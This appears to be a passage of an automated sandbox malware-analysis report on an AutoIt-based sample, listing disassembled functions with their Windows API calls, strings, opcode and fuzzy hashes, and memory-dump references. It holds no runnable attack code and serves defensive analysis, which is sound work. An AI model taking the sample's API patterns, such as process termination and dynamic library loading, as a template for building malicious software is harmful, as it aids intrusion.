                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDevice$Release
                                                                                • String ID:
                                                                                • API String ID: 1035833867-0
                                                                                • Opcode ID: c045e1283cdf79bc20f5b00602b54c727243351bc9bc88674fb179c4ad24f248
                                                                                • Instruction ID: c4a10ce048ac044b2cc8eeef71bd79511d965ebc5b9516b418c403ec1cdf730c
                                                                                • Opcode Fuzzy Hash: c045e1283cdf79bc20f5b00602b54c727243351bc9bc88674fb179c4ad24f248
                                                                                • Instruction Fuzzy Hash: 5201A275E00B18BBEB109BA59C49E5EBFB9EF48361F045066FA05E7380D6B09D00CFA0
                                                                                Function 005D1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 005D1BF4
                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 005D1BFC
                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 005D1C07
                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 005D1C12
                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 005D1C1A
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 005D1C22
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                • Opcode ID: d188df23f8f2e2e872af121034a701e529bc129031237d79674b9023a4fc0855
                                                                                • Instruction ID: 2093f156cbcdc0ce0d441b1af84640ddbbb0b8e4f79e6d327769b8c9887c8454
                                                                                • Opcode Fuzzy Hash: d188df23f8f2e2e872af121034a701e529bc129031237d79674b9023a4fc0855
                                                                                • Instruction Fuzzy Hash: EA0148B0902B5A7DE3008F5A8C85A52FEA8FF19354F00411B915C47941C7F5A864CBE5
                                                                                Function 0063EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0063EB30
                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0063EB46
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0063EB55
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0063EB64
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0063EB6E
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0063EB75
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                • Opcode ID: e7bcbe69185a566a3f73ca3275f6e2022f952a1d50c6319d53c1b83b078a41eb
                                                                                • Instruction ID: 987a3475941e45ba2ef043b20b84c67c68b0fda048ed26801c83befc66f0ffa4
                                                                                • Opcode Fuzzy Hash: e7bcbe69185a566a3f73ca3275f6e2022f952a1d50c6319d53c1b83b078a41eb
                                                                                • Instruction Fuzzy Hash: C2F01772240958BBE7216B63DC0EEFB7A7DEFCAB21F001158F642E119196E05A0186B9
                                                                                Function 00627439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClientRect.USER32(?), ref: 00627452
                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00627469
                                                                                • GetWindowDC.USER32(?), ref: 00627475
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00627484
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00627496
                                                                                • GetSysColor.USER32(00000005), ref: 006274B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                • String ID:
                                                                                • API String ID: 272304278-0
                                                                                • Opcode ID: 69031397ce57590d8598274237325a5018da82fe8151833d27034c64d796ad41
                                                                                • Instruction ID: 590ef8989ec7e4510aa886c4d25fec957174f811d8bad66391f0e2eef47353d9
                                                                                • Opcode Fuzzy Hash: 69031397ce57590d8598274237325a5018da82fe8151833d27034c64d796ad41
                                                                                • Instruction Fuzzy Hash: 7C018B31400A15EFDB106FA4EC08BFE7BB7FB04321F106060F956A21A0CB712E51AF51
                                                                                Function 00631874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063187F
                                                                                • UnloadUserProfile.USERENV(?,?), ref: 0063188B
                                                                                • CloseHandle.KERNEL32(?), ref: 00631894
                                                                                • CloseHandle.KERNEL32(?), ref: 0063189C
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006318A5
                                                                                • HeapFree.KERNEL32(00000000), ref: 006318AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                • Opcode ID: 8a5e4134cfad87f21309990825cf4c9edbc1241611e20ea6a3c659b707a722a0
                                                                                • Instruction ID: f61825a08f09d88ecb7019be31fc881faeebdf931320e37efa38cd8c3fd4e12d
                                                                                • Opcode Fuzzy Hash: 8a5e4134cfad87f21309990825cf4c9edbc1241611e20ea6a3c659b707a722a0
                                                                                • Instruction Fuzzy Hash: 89E0C936004901BBDB016BA3ED0C915FF2AFB4A7327109221F26591170CBB26420DB60
                                                                                Function 005DBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 005DBEB3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: D%j$D%j$D%j$D%jD%j
                                                                                • API String ID: 1385522511-528900389
                                                                                • Opcode ID: 637d596d62a2451f4b5496fdac43cf5b23189fd5cb93438537ee70192ea54dfc
                                                                                • Instruction ID: 69a5d6cf529ae3bd485d22c71cf7926fc7b30085faf162ab29ff1b04e04fa43e
                                                                                • Opcode Fuzzy Hash: 637d596d62a2451f4b5496fdac43cf5b23189fd5cb93438537ee70192ea54dfc
                                                                                • Instruction Fuzzy Hash: 92911775A0020ACFDB28DF5DC0906A9BBF3FF59310B26456BD945AB351E731AD81CB90
                                                                                Function 00657B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005F0242: EnterCriticalSection.KERNEL32(006A070C,006A1884,?,?,005E198B,006A2518,?,?,?,005D12F9,00000000), ref: 005F024D
                                                                                  • Part of subcall function 005F0242: LeaveCriticalSection.KERNEL32(006A070C,?,005E198B,006A2518,?,?,?,005D12F9,00000000), ref: 005F028A
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 005F00A3: __onexit.LIBCMT ref: 005F00A9
                                                                                • __Init_thread_footer.LIBCMT ref: 00657BFB
                                                                                  • Part of subcall function 005F01F8: EnterCriticalSection.KERNEL32(006A070C,?,?,005E8747,006A2514), ref: 005F0202
                                                                                  • Part of subcall function 005F01F8: LeaveCriticalSection.KERNEL32(006A070C,?,005E8747,006A2514), ref: 005F0235
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                • String ID: +Tb$5$G$Variable must be of type 'Object'.
                                                                                • API String ID: 535116098-488681553
                                                                                • Opcode ID: b5ea295c07397857a7294f02df67256f87cbde0a1b3c5020a3023f0d3ccc71f3
                                                                                • Instruction ID: aa168381c03c60cb0d985ebdc6af8bba65b7f077f53f593f347e8de908b2812c
                                                                                • Opcode Fuzzy Hash: b5ea295c07397857a7294f02df67256f87cbde0a1b3c5020a3023f0d3ccc71f3
                                                                                • Instruction Fuzzy Hash: BA918C70A04209AFCB14EF58E8959BDBBB2FF45301F14815AFC469B392DB31AE49CB51
                                                                                Function 0063C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D7620: _wcslen.LIBCMT ref: 005D7625
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0063C6EE
                                                                                • _wcslen.LIBCMT ref: 0063C735
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0063C79C
                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0063C7CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                                • String ID: 0
                                                                                • API String ID: 1227352736-4108050209
                                                                                • Opcode ID: 5c8b31bc0f52fb5f8db946b583e582352543b1d2a0a4b481b8f6e966199448aa
                                                                                • Instruction ID: 7b11a5e892e8b8189a66e676545004fe4ff6cbe4493d41e64a457122862f1ef9
                                                                                • Opcode Fuzzy Hash: 5c8b31bc0f52fb5f8db946b583e582352543b1d2a0a4b481b8f6e966199448aa
                                                                                • Instruction Fuzzy Hash: B251B3716043419BD7149F28C849BAB7BEAAF8A324F04092DF995F72A1DB70DD04CF92
                                                                                Function 0065AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 0065AEA3
                                                                                  • Part of subcall function 005D7620: _wcslen.LIBCMT ref: 005D7625
                                                                                • GetProcessId.KERNEL32(00000000), ref: 0065AF38
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0065AF67
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                • String ID: <$@
                                                                                • API String ID: 146682121-1426351568
                                                                                • Opcode ID: 9f7a74d2d7eb28fe7f0180785678175024acfc9695a0761b5c44606365c9957d
                                                                                • Instruction ID: 4ab3708f8091e626381e0fe7b866976f782af359715d120c7db90fdc304d7039
                                                                                • Opcode Fuzzy Hash: 9f7a74d2d7eb28fe7f0180785678175024acfc9695a0761b5c44606365c9957d
                                                                                • Instruction Fuzzy Hash: CB71AD70A0021ACFCB14DF98D485A9EBBF1FF48310F04859AE856AB362D770ED45CB91
                                                                                Function 0063719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00637206
                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0063723C
                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0063724D
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006372CF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                • String ID: DllGetClassObject
                                                                                • API String ID: 753597075-1075368562
                                                                                • Opcode ID: 2e4bef65a2ab5111ef00406a8c8f80736308c823dbcdcc4dc4d9abaaa0a4efda
                                                                                • Instruction ID: 2f586b0a76aca5312e9778fe5b2aab64a409e1b2554d97ee410ebf7314a8aafa
                                                                                • Opcode Fuzzy Hash: 2e4bef65a2ab5111ef00406a8c8f80736308c823dbcdcc4dc4d9abaaa0a4efda
                                                                                • Instruction Fuzzy Hash: 354141B1A04605EFDB25CF54C884A9B7BAAEF45310F1580ADFD059F20AD7B1DA45CBE0
                                                                                Function 00662F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00662F8D
                                                                                • LoadLibraryW.KERNEL32(?), ref: 00662F94
                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00662FA9
                                                                                • DestroyWindow.USER32(?), ref: 00662FB1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                • String ID: SysAnimate32
                                                                                • API String ID: 3529120543-1011021900
                                                                                • Opcode ID: f160767ccfa18ce314b8349344f4c32ed1cdada456cf5433d571034164b388d0
                                                                                • Instruction ID: 74e732dd7b6fea0754544e95c1c0f09693c7fbd487267474523f9e0525802f4e
                                                                                • Opcode Fuzzy Hash: f160767ccfa18ce314b8349344f4c32ed1cdada456cf5433d571034164b388d0
                                                                                • Instruction Fuzzy Hash: 3421F0B1240A06ABEF104FA4DCA0EBB37BEEF59364F104219F950D6290D7B1DC419760
                                                                                Function 005F4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005F4D1E,006028E9,?,005F4CBE,006028E9,006988B8,0000000C,005F4E15,006028E9,00000002), ref: 005F4D8D
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005F4DA0
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,005F4D1E,006028E9,?,005F4CBE,006028E9,006988B8,0000000C,005F4E15,006028E9,00000002,00000000), ref: 005F4DC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0247b5035893bc9082b1dc415441b9fd31287eb9700651c3642bc8e9706ea581
                                                                                • Instruction ID: bbd22735b5631576fcbea26af3e4d7a69969a60ba0bdf3851b03eccc01e382d4
                                                                                • Opcode Fuzzy Hash: 0247b5035893bc9082b1dc415441b9fd31287eb9700651c3642bc8e9706ea581
                                                                                • Instruction Fuzzy Hash: 8CF0AF30A0020CBBDB149F94DC09BBEBFBAEF44722F0000A9F909E2260CB745940CF90
                                                                                Function 005D4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D4EDD,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E9C
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005D4EAE
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,005D4EDD,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4EC0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 145871493-3689287502
                                                                                • Opcode ID: b3c42348219ffd65059208f62835aeb9bee0d66b8a530c153bcf97857e7442a8
                                                                                • Instruction ID: 72284425e2ddc3c6536ac95d9e43e3a361feb02cd7dd646ddcf1677c8731421e
                                                                                • Opcode Fuzzy Hash: b3c42348219ffd65059208f62835aeb9bee0d66b8a530c153bcf97857e7442a8
                                                                                • Instruction Fuzzy Hash: 7DE08635A019226BD3311729AC18A7BAA5DFF82B7270A0117FC40D2300DBB0CD0544A1
                                                                                Function 005D4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00613CDE,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E62
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005D4E74
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00613CDE,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E87
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 145871493-1355242751
                                                                                • Opcode ID: db2a63f40f286d111ae02fb1eef10da7dd24847aa6b9a5dcdf99db1d76b6723e
                                                                                • Instruction ID: 2f1a99bb74f9a028b965f0d9ef2706a5c9ff2e83e78ed631ff8337f741123793
                                                                                • Opcode Fuzzy Hash: db2a63f40f286d111ae02fb1eef10da7dd24847aa6b9a5dcdf99db1d76b6723e
                                                                                • Instruction Fuzzy Hash: A4D01235502E7167DB321B29AC18DABAF1EFFC6B713060617F945A2214CFB0CD0189D2
                                                                                Function 0065A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 0065A427
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0065A435
                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0065A468
                                                                                • CloseHandle.KERNEL32(?), ref: 0065A63D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
